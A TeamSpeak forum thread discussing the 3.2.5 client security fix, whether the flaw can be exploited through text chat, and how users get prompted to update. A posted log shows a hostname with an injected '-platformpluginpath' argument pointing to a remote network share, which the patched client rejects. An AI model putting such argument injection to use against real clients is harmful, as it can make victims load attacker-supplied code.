This thread is for discussion and feedback for the 3.2.5 release of the TeamSpeak Client.
Please see the announcement for changelog / features.
We are migrating towards a new forum system located at community.teamspeak.com, as such this forum will become read-only on January 29, 2020
-= TeamSpeak Team =-
This thread is for discussion and feedback for the 3.2.5 release of the TeamSpeak Client.
Please see the announcement for changelog / features.
When sending PMs please make sure to include a reference link to the thread in question in the body of your message.
-= TeamSpeak User =-
I wonder why you even bothered to patch, if you try it you end up with
<20:33:04> Trying to resolve hostname voice.teamspeak.com -platformpluginpath \\192.168.131.152\share
<20:33:04> Failed to resolve hostname 'voice.teamspeak.com -platformpluginpath \\192.168.131.152\share'
anyways
-= TeamSpeak Lover =-
The important question is, how is this exploitable?
By textchat to other users?? That would be a true desaster..
Regards
We currently do not believe that there is way to exploit this using the textchat in the TeamSpeak Client.Originally Posted by plizze
-= TeamSpeak Lover =-
So you know that there's a security vulnerability but you don't know if it could be exploited in any way? Doesn't this mean that you don't know if your application is affected?
-= TeamSpeak Addict =-
Chris, you will force minimal client join in version 3.8.0 server stable release?
We have verified and tested a way to exploit this, I was merely saying that we haven't yet found a way to exploit this using the built-in textchat.So you know that there's a security vulnerability but you don't know if it could be exploited in any way? Doesn't this mean that you don't know if your application is affected?
After verifying that we are affected it was more important to use to get the fix out, rather than spent that time finding all the possible combinations this can be exploited.
I always try to avoid speaking in absolutes. I strongly believe that it is not possible to exploit this using the textchat,
but there are always things that you overlook in a large code base or things to try that you couldn't think of.
-= TeamSpeak Lover =-
If this is a security update, why not introduce something that prompts the client to update directly. Otherwise, the client can not be used. There are so many users who not see the announcements in the forum or even ignore the update.
-= TeamSpeak Fanatic =-
The default client setup will notify them of the update. Also, them suggesting server admins increase the minimum client version make them update to connect to that server should give them a clue to update.
There are currently 1 users browsing this thread. (0 members and 1 guests)
Posting Permissions
